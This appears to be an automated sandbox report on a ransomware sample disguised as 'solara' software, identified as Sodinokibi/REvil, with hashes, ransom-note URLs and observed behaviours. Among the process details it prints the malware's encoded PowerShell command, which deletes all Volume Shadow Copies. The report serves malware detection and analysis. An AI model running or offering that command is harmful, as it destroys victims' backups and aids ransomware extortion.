Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20-11-2024 10:24
Behavioral task
behavioral1
Sample
solara/run to start solara.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
solara/run to start solara.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
solara/solara.dll
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
solara/solara.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
solara/solarafix.exe
Resource
win7-20240729-en
Behavioral task
behavioral6
Sample
solara/solarafix.exe
Resource
win10v2004-20241007-en
General
-
Target
solara/solara.dll
-
Size
164KB
-
MD5
6e3efb83299d800edf1624ecbc0665e7
-
SHA1
0bd22f204c5373f1a22d9a02c59f69f354a2cc0d
-
SHA256
2ca64feaaf5ab6cf96677fbc2bc0e1995b3bc93472d7af884139aa757240e3f6
-
SHA512
dd1675bb15eb8ea2933b25413271117823ad7ff38280e7f552b5201e3a5bef8607a2112df2e24f598449ebfdb570ff9458aba0314ed8819dd4d774ea855e9ad2
-
SSDEEP
3072:FWeI5JXJRGpUhFiWjmfb+HP+rnRfU9ECs5p:FWe29/GuzjmfCHWtUiCs5p
Malware Config
Extracted
C:\Program Files (x86)\ryg6t1-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/20B78BB47602048C
http://decryptor.top/20B78BB47602048C
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Sodinokibi family
-
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\X: rundll32.exe File opened (read-only) \??\Y: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\R: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\U: rundll32.exe File opened (read-only) \??\F: rundll32.exe File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\I: rundll32.exe File opened (read-only) \??\N: rundll32.exe File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\Z: rundll32.exe File opened (read-only) \??\D: rundll32.exe File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\J: rundll32.exe File opened (read-only) \??\P: rundll32.exe -
Drops file in Program Files directory 26 IoCs
description ioc Process File opened for modification \??\c:\program files\FormatCheckpoint.wm rundll32.exe File opened for modification \??\c:\program files\LockMerge.xps rundll32.exe File opened for modification \??\c:\program files\ReceiveSend.mp4v rundll32.exe File opened for modification \??\c:\program files\RestoreSync.wav rundll32.exe File opened for modification \??\c:\program files\SwitchRead.emz rundll32.exe File opened for modification \??\c:\program files\UnpublishInitialize.rtf rundll32.exe File created \??\c:\program files\ryg6t1-readme.txt rundll32.exe File opened for modification \??\c:\program files\ConvertCopy.mht rundll32.exe File opened for modification \??\c:\program files\UnregisterBlock.asf rundll32.exe File opened for modification \??\c:\program files\OpenMerge.xps rundll32.exe File opened for modification \??\c:\program files\PublishPush.php rundll32.exe File opened for modification \??\c:\program files\RepairUninstall.tif rundll32.exe File created \??\c:\program files (x86)\ryg6t1-readme.txt rundll32.exe File opened for modification \??\c:\program files\DenyOpen.asp rundll32.exe File opened for modification \??\c:\program files\RepairInitialize.tmp rundll32.exe File opened for modification \??\c:\program files\SubmitCopy.xml rundll32.exe File opened for modification \??\c:\program files\TraceSplit.TS rundll32.exe File opened for modification \??\c:\program files\AddClear.mhtml rundll32.exe File opened for modification \??\c:\program files\OutSubmit.m4v rundll32.exe File opened for modification \??\c:\program files\PingComplete.wmf rundll32.exe File opened for modification \??\c:\program files\StopCompare.vstm rundll32.exe File opened for modification \??\c:\program files\UninstallConvertTo.iso rundll32.exe File opened for modification \??\c:\program files\WriteEnable.dotx rundll32.exe File opened for modification \??\c:\program files\WritePing.jpg rundll32.exe File opened for modification \??\c:\program files\DebugNew.dxf rundll32.exe File opened for modification \??\c:\program files\InitializeExport.m3u rundll32.exe -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4424 rundll32.exe 4424 rundll32.exe 4400 powershell.exe 4400 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4400 powershell.exe Token: SeBackupPrivilege 3716 vssvc.exe Token: SeRestorePrivilege 3716 vssvc.exe Token: SeAuditPrivilege 3716 vssvc.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 2932 wrote to memory of 4424 2932 rundll32.exe 83 PID 2932 wrote to memory of 4424 2932 rundll32.exe 83 PID 2932 wrote to memory of 4424 2932 rundll32.exe 83 PID 4424 wrote to memory of 4400 4424 rundll32.exe 85 PID 4424 wrote to memory of 4400 4424 rundll32.exe 85 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\solara\solara.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\solara\solara.dll,#12⤵
- Enumerates connected drives
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4424 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4400
-
-
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:4420
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3716
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6KB
MD54b44f8e313838d705b91fa89f5407c1c
SHA130ded6181390ab3fa338af6c8730e8cd72b241da
SHA256e7f6122ba482ba9968ace3e51a39e99a4489f98c9dba375f78e60260914a431e
SHA512c5da19db3c5aef7a789c369ddfbc7c15ceba3ab233cbcb27064d4628f0d624f83b69a3889794adfb23d49223b3b37b8bb9b24c837a92c6da406eee5c24df7ba5
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82